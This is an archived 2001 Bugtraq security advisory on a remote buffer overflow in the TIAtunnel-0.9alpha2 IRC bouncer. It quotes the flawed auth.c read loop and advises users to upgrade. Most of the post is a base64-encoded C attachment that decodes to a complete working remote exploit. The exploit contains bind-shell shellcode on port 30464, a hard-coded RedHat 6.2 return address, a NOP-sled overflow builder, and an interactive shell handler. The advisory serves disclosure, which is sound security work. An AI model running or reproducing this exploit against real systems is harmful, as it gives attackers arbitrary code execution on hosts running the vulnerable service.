[20891] in bugtraq
Buffer Overflow in TIAtunnel-0.9alpha2
daemon@ATHENA.MIT.EDU (qitest1)
Wed Jun 6 13:05:35 2001
Date: Wed, 6 Jun 2001 15:45:55 +0200 (CEST)
From: qitest1 <qitest1@cercaband.com>
To: bugtraq@securityfocus.com
Message-ID: <Pine.LNX.4.21.0106061541000.1049-200000@localhost.localdomain>
MIME-Version: 1.0
Content-Type: MULTIPART/MIXED; BOUNDARY="8323328-449565556-991835155=:1049"
--8323328-449565556-991835155=:1049
Content-Type: TEXT/PLAIN; charset=US-ASCII
/* qitest1's security advisory #001
*/
Buffer Overflow in TIAtunnel-0.9alpha2
+Systems Affected
Any system running TIAtunnel-0.9alpha2
+Program Description
TIAtunnel is a simple IRC bouncer that allows access from a simple
IPv4 box to any kind of well-known server. It has been written by
tHE rECIdjVO <recidjvo@pkcrew.org>, http://tiatunnel.pkcrew.org/.
+Vulnerability And Impact
A remote attacker can overflow a buffer and execute arbitrary code
on the system with the privileges of the user running TIAtunnel.
Infact in auth.c at line 28 we have:
struct tunnel *auth_conn(int *csock, int entries)
{
char authline[512]; /* static char buf */
struct tunnel *t_current;
int i = 0;
// Read one line from the client
bzero(authline, 512);
while((authline[i - 1] != '\n') && (authline[i - 1] != '\r') &&
(i < 1024)) { /* 1024?! =) */
read(*csock, (authline + i++), (size_t)1);
}
+Solution
Author was contacted. Upgrade your version of TIAtunnel.
+Exploit
This bug can be succesfully exploited by a remote attacker. There is
a demonstrative exploit code attached to this advisory. See the code
for more info.
--
/* qitest1 http://qitest1.cjb.net *
* ``Ut tensio, sic vis. 69 tecum sis.'' *
* main(){if(unsatisfied == 69) try_come(in);} */
--8323328-449565556-991835155=:1049
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="tiatunnel.c"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.4.21.0106061545550.1049@localhost.localdomain>
Content-Description:
Content-Disposition: attachment; filename="tiatunnel.c"
LyogIA0KICogIFRJQXR1bm5lbC0wLjlhbHBoYTIgTGludXggeDg2IHJlbW90
ZSBleHBsb2l0DQogKiAgYnkgcWl0ZXN0MSAtIDUvMDYvMjAwMQ0KICoNCiAq
ICBTaGVsbGNvZGUgaXMgZXhlY3V0ZWQgd2l0aCB0aGUgcHJpdmlsZWdlcyBv
ZiB0aGUgcHJvZ3JhbS4gSSANCiAqICBub3RpY2VkIHRoYXQgd2l0aCBhIHNp
bXBsZSBleGVjdmUoKSBhIHNoZWxsIHdhcyBleGVjdXRlZCBidXQgaXRzIA0K
ICogIElPIHdhcyBsaW5rZWQgd2l0aCB0aGUgdGVybSB3aGVyZSBUSUF0dW5u
ZWwgd2FzIGxhdW5jaGVkLiBUaGlzIA0KICogIGlzIG5vdCBhIHByb2JsZW0g
Zm9yIHVzIGlmIHdlIHVzZSBhIGJpbmRzaGVsbCBjb2RlLiAgDQogKg0KICog
IEdyZWV0czogcmVjaWRqdm8tPlRueCBmb3IgdGhpcyBidWcuIEFuZCBub3cg
eW91IGNhbiByZWFsbHkgc21pbGUuIA0KICoJICAgIE5haWwgICAgLT5EZWFy
IGZyaWVuZCA7KQkJIA0KICogIEhtbS4uIDB4Njkgc2VlbXMgdG8gc3RyaWtl
IGFnYWluLi4NCiAqLw0KDQojaW5jbHVkZSA8c3RkaW8uaD4NCiNpbmNsdWRl
IDxzdHJpbmcuaD4NCiNpbmNsdWRlIDx1bmlzdGQuaD4NCiNpbmNsdWRlIDxu
ZXRpbmV0L2luLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCg0KI2RlZmluZSBS
RVRQT1MgCQk1MTYJCQ0KDQpzdHJ1Y3QgdGFyZw0Kew0KICAgaW50ICAgICAg
ICAgICAgICAgICAgZGVmOw0KICAgY2hhciAgICAgICAgICAgICAgICAgKmRl
c2NyOw0KICAgdW5zaWduZWQgbG9uZyBpbnQgICAgcmV0YWRkcjsNCn07DQoN
CnN0cnVjdCB0YXJnIHRhcmdldFtdPQ0KICAgIHsgICAgICAgICAgICAgICAg
ICAgDQogICAgICB7MCwgIlJlZEhhdCA2LjIgd2l0aCBUSUF0dW5uZWwtMC45
YWxwaGEyIGZyb20gdGFyLmd6IiwgMHhiZmZmZjY3Y30sDQogICAgICB7Njks
IE5VTEwsIDB9DQogICAgfTsNCg0KY2hhciBzaGVsbGNvZGVbXSA9CQkvKiBi
aW5kc2hlbGwgYXQgcG9ydCAzMDQ2NCAqLw0KICAiXHgzMVx4YzBceGIwXHgw
Mlx4Y2RceDgwXHg4NVx4YzBceDc1XHg0M1x4ZWJceDQzXHg1ZVx4MzFceGMw
Ig0KICAiXHgzMVx4ZGJceDg5XHhmMVx4YjBceDAyXHg4OVx4MDZceGIwXHgw
MVx4ODlceDQ2XHgwNFx4YjBceDA2Ig0KICAiXHg4OVx4NDZceDA4XHhiMFx4
NjZceGIzXHgwMVx4Y2RceDgwXHg4OVx4MDZceGIwXHgwMlx4NjZceDg5Ig0K
ICAiXHg0Nlx4MGNceGIwXHg3N1x4NjZceDg5XHg0Nlx4MGVceDhkXHg0Nlx4
MGNceDg5XHg0Nlx4MDRceDMxIg0KICAiXHhjMFx4ODlceDQ2XHgxMFx4YjBc
eDEwXHg4OVx4NDZceDA4XHhiMFx4NjZceGIzXHgwMlx4Y2RceDgwIg0KICAi
XHhlYlx4MDRceGViXHg1NVx4ZWJceDViXHhiMFx4MDFceDg5XHg0Nlx4MDRc
eGIwXHg2Nlx4YjNceDA0Ig0KICAiXHhjZFx4ODBceDMxXHhjMFx4ODlceDQ2
XHgwNFx4ODlceDQ2XHgwOFx4YjBceDY2XHhiM1x4MDVceGNkIg0KICAiXHg4
MFx4ODhceGMzXHhiMFx4M2ZceDMxXHhjOVx4Y2RceDgwXHhiMFx4M2ZceGIx
XHgwMVx4Y2RceDgwIg0KICAiXHhiMFx4M2ZceGIxXHgwMlx4Y2RceDgwXHhi
OFx4MmZceDYyXHg2OVx4NmVceDg5XHgwNlx4YjhceDJmIg0KICAiXHg3M1x4
NjhceDJmXHg4OVx4NDZceDA0XHgzMVx4YzBceDg4XHg0Nlx4MDdceDg5XHg3
Nlx4MDhceDg5Ig0KICAiXHg0Nlx4MGNceGIwXHgwYlx4ODlceGYzXHg4ZFx4
NGVceDA4XHg4ZFx4NTZceDBjXHhjZFx4ODBceDMxIg0KICAiXHhjMFx4YjBc
eDAxXHgzMVx4ZGJceGNkXHg4MFx4ZThceDViXHhmZlx4ZmZceGZmIjsNCg0K
Y2hhcgkJbXlidWZbUkVUUE9TICsgNCArIDEgKyAxXTsNCg0KaW50ICAgICAg
ICAgICAgIHNvY2thbWkoY2hhciAqaG9zdCwgaW50IHBvcnQpOw0Kdm9pZAkJ
ZG9fbXlidWYodW5zaWduZWQgbG9uZyByZXRhZGRyKTsNCnZvaWQJCXNoZWxs
YW1pKGludCBzb2NrKTsNCnZvaWQgICAgICAgICAgICB1c2FnZShjaGFyICpw
cm9nbmFtZSk7DQoNCm1haW4oaW50IGFyZ2MsIGNoYXIgKiphcmd2KQ0Kew0K
aW50IAlpLA0KCXNlbCA9IDAsDQoJcG9ydCA9IDAsDQoJb2Zmc2V0ID0gMCwN
Cglzb2NrLA0KICAgICAgICBjbnQ7DQpjaGFyIAkqaG9zdCA9IE5VTEw7DQoN
CiAgcHJpbnRmKCJcbiAgVElBdHVubmVsLTAuOWFscGhhMiBleHBsb2l0IGJ5
IHFpdGVzdDFcblxuIik7DQogIA0KICBpZihhcmdjID09IDEpDQogICAgICAg
IHVzYWdlKGFyZ3ZbMF0pOw0KICB3aGlsZSgoY250ID0gZ2V0b3B0KGFyZ2Ms
YXJndiwiaDpwOnQ6bzoiKSkgIT0gRU9GKQ0KICAgIHsNCiAgIHN3aXRjaChj
bnQpDQogICAgICAgIHsNCiAgIGNhc2UgJ2gnOg0KICAgICBob3N0ID0gc3Ry
ZHVwKG9wdGFyZyk7DQogICAgIGJyZWFrOw0KICAgY2FzZSAncCc6DQogICAg
IHBvcnQgPSBhdG9pKG9wdGFyZyk7DQogICAgIGJyZWFrOw0KICAgY2FzZSAn
dCc6DQogICAgIHNlbCA9IGF0b2kob3B0YXJnKTsgICAgICAgDQogICAgIGJy
ZWFrOw0KICAgY2FzZSAnbyc6DQogICAgIG9mZnNldCA9IGF0b2kob3B0YXJn
KTsNCiAgICAgYnJlYWs7DQogICBkZWZhdWx0Og0KICAgICB1c2FnZShhcmd2
WzBdKTsNCiAgICAgYnJlYWs7DQogICAgICAgIH0NCiAgICB9DQogIGlmKGhv
c3QgPT0gTlVMTCkNCiAgICAgICAgdXNhZ2UoYXJndlswXSk7DQogIGlmKHBv
cnQgPT0gMCkNCgl1c2FnZShhcmd2WzBdKTsNCg0KICBwcmludGYoIitIb3N0
OiAlc1xuICBhczogJXNcbiIsIGhvc3QsIHRhcmdldFtzZWxdLmRlc2NyKTsN
CiAgcHJpbnRmKCIrQ29ubmVjdGluZyB0byAlcy4uLlxuIiwgaG9zdCk7DQog
IHNvY2sgPSBzb2NrYW1pKGhvc3QsIHBvcnQpOw0KICBwcmludGYoIiAgY29u
bmVjdGVkXG4iKTsNCg0KICB0YXJnZXRbMF0ucmV0YWRkciArPSBhdG9pKGFy
Z3ZbMV0pOw0KICBwcmludGYoIitCdWlsZGluZyBidWZmZXIgd2l0aCByZXRh
ZGRyOiAlcC4uLlxuIiwgdGFyZ2V0WzBdLnJldGFkZHIpOw0KICBkb19teWJ1
Zih0YXJnZXRbMF0ucmV0YWRkcik7DQogIHN0cmNhdChteWJ1ZiwgIlxuIik7
DQogIHByaW50ZigiICBkb25lXG4iKTsNCiAgc2VuZChzb2NrLCBteWJ1Ziwg
c3RybGVuKG15YnVmKSwgMCk7DQogIHByaW50ZigiK092ZXJmbG93aW5nLi4u
XG4iKTsNCg0KICBwcmludGYoIitaemluZy4uLlxuIik7DQogIHNsZWVwKDIp
Ow0KICBwcmludGYoIitHZXR0aW5nIHNoZWxsLi4uXG4iKTsNCiAgc29jayA9
IHNvY2thbWkoaG9zdCwgMzA0NjQpOyAgDQogIHNoZWxsYW1pKHNvY2spOw0K
fQ0KDQppbnQNCnNvY2thbWkoY2hhciAqaG9zdCwgaW50IHBvcnQpDQp7DQpz
dHJ1Y3Qgc29ja2FkZHJfaW4gYWRkcmVzczsNCnN0cnVjdCBob3N0ZW50ICpo
cDsNCmludCBzb2NrOw0KDQogIHNvY2sgPSBzb2NrZXQoQUZfSU5FVCwgU09D
S19TVFJFQU0sIDApOw0KICBpZihzb2NrID09IC0xKQ0KCXsNCiAgICAgICAg
ICBwZXJyb3IoInNvY2tldCgpIik7DQogICAgICAgICAgZXhpdCgtMSk7DQog
ICAgICAgIH0NCiANCiAgaHAgPSBnZXRob3N0YnluYW1lKGhvc3QpOw0KICBp
ZihocCA9PSBOVUxMKQ0KICAgICAgICB7DQogICAgICAgICAgcGVycm9yKCJn
ZXRob3N0YnluYW1lKCkiKTsNCiAgICAgICAgICBleGl0KC0xKTsNCiAgICAg
ICAgfQ0KDQogIG1lbXNldCgmYWRkcmVzcywgMCwgc2l6ZW9mKGFkZHJlc3Mp
KTsNCiAgbWVtY3B5KChjaGFyICopICZhZGRyZXNzLnNpbl9hZGRyLCBocC0+
aF9hZGRyLCBocC0+aF9sZW5ndGgpOw0KICBhZGRyZXNzLnNpbl9mYW1pbHkg
PSBBRl9JTkVUOw0KICBhZGRyZXNzLnNpbl9wb3J0ID0gaHRvbnMocG9ydCk7
DQoNCiAgaWYoY29ubmVjdChzb2NrLCAoc3RydWN0IHNvY2thZGRyICopICZh
ZGRyZXNzLCBzaXplb2YoYWRkcmVzcykpID09IC0xKQ0KICAgICAgICB7DQog
ICAgICAgICAgcGVycm9yKCJjb25uZWN0KCkiKTsNCiAgICAgICAgICBleGl0
KC0xKTsNCiAgICAgICAgfQ0KDQogIHJldHVybihzb2NrKTsNCn0NCg0Kdm9p
ZA0KZG9fbXlidWYodW5zaWduZWQgbG9uZyBpbnQgcmV0YWRkcikNCnsNCmlu
dAkJaSwNCgkJbiA9IDA7DQp1bnNpZ25lZCBsb25nIAkqcmV0Ow0KDQogIG1l
bXNldChteWJ1ZiwgMHg5MCwgc2l6ZW9mKG15YnVmKSk7DQogIGZvcihpID0g
UkVUUE9TIC0gc3RybGVuKHNoZWxsY29kZSk7IGkgPCBSRVRQT1M7IGkrKykN
Cgl7DQogICAgICAgICAgbXlidWZbaV0gPSBzaGVsbGNvZGVbbisrXTsNCgl9
DQogIHJldCA9ICh1bnNpZ25lZCBsb25nICopIChteWJ1ZiArIFJFVFBPUyk7
DQogICpyZXQgPSByZXRhZGRyOw0KICBteWJ1ZltSRVRQT1MgKyA0XSA9ICdc
eDAwJzsNCn0NCg0Kdm9pZA0Kc2hlbGxhbWkoaW50IHNvY2spDQp7DQppbnQg
ICAgICAgICAgICAgbjsNCmNoYXIgICAgICAgICAgICByZWN2YnVmWzEwMjRd
Ow0KY2hhciAgICAgICAgICAgICpjbWQgPSAiaWQ7IHVuYW1lIC1hXG4iOw0K
ZmRfc2V0ICAgICAgICAgIHJzZXQ7DQoNCiAgc2VuZChzb2NrLCBjbWQsIHN0
cmxlbihjbWQpLCAwKTsNCg0KICB3aGlsZSAoMSkNCiAgICB7DQogICAgICBG
RF9aRVJPKCZyc2V0KTsNCiAgICAgIEZEX1NFVChzb2NrLCZyc2V0KTsNCiAg
ICAgIEZEX1NFVChTVERJTl9GSUxFTk8sJnJzZXQpOw0KICAgICAgc2VsZWN0
KHNvY2srMSwmcnNldCxOVUxMLE5VTEwsTlVMTCk7DQogICAgICBpZiAoRkRf
SVNTRVQoc29jaywmcnNldCkpDQogICAgICAgIHsNCiAgICAgICAgICBuPXJl
YWQoc29jayxyZWN2YnVmLDEwMjQpOw0KICAgICAgICAgIGlmIChuIDw9IDAp
DQogICAgICAgICAgICB7DQogICAgICAgICAgICAgIHByaW50ZigiQ29ubmVj
dGlvbiBjbG9zZWQgYnkgZm9yZWlnbiBob3N0LlxuIik7DQogICAgICAgICAg
ICAgIGV4aXQoMCk7DQogICAgICAgICAgICB9DQogICAgICAgICAgcmVjdmJ1
ZltuXT0wOw0KICAgICAgICAgIHByaW50ZigiJXMiLHJlY3ZidWYpOw0KICAg
ICAgICB9DQogICAgICBpZiAoRkRfSVNTRVQoU1RESU5fRklMRU5PLCZyc2V0
KSkNCiAgICAgICAgew0KICAgICAgICAgIG49cmVhZChTVERJTl9GSUxFTk8s
cmVjdmJ1ZiwxMDI0KTsNCiAgICAgICAgICBpZiAobj4wKQ0KICAgICAgICAg
ICAgew0KICAgICAgICAgICAgICByZWN2YnVmW25dPTA7DQogICAgICAgICAg
ICAgIHdyaXRlKHNvY2sscmVjdmJ1ZixuKTsNCiAgICAgICAgICAgIH0NCiAg
ICAgICAgfQ0KICAgIH0NCiAgcmV0dXJuOw0KfQ0KDQp2b2lkDQp1c2FnZShj
aGFyICpwcm9nbmFtZSkNCnsNCmludCAgICAgICAgICAgICBpID0gMDsNCiAg
DQogIHByaW50ZigiVXNhZ2U6ICVzIFtvcHRpb25zXVxuIiwgcHJvZ25hbWUp
Ow0KICBwcmludGYoIk9wdGlvbnM6XG4iDQogICAgICAgICAiICAtaCBob3N0
bmFtZVxuIg0KCSAiICAtcCBwb3J0XG4iDQogICAgICAgICAiICAtdCB0YXJn
ZXRcbiINCiAgICAgICAgICIgIC1vIG9mZnNldFxuIg0KICAgICAgICAgIkF2
YWlsYWJsZSB0YXJnZXRzOlxuIik7DQogIHdoaWxlKHRhcmdldFtpXS5kZWYg
IT0gNjkpDQogICAgICAgIHsgDQogICAgICAgICAgcHJpbnRmKCIgICVkKSAl
c1xuIiwgdGFyZ2V0W2ldLmRlZiwgdGFyZ2V0W2ldLmRlc2NyKTsNCiAgICAg
ICAgICBpKys7DQogICAgICAgIH0gDQoNCiAgZXhpdCgxKTsNCn0NCg==
--8323328-449565556-991835155=:1049--
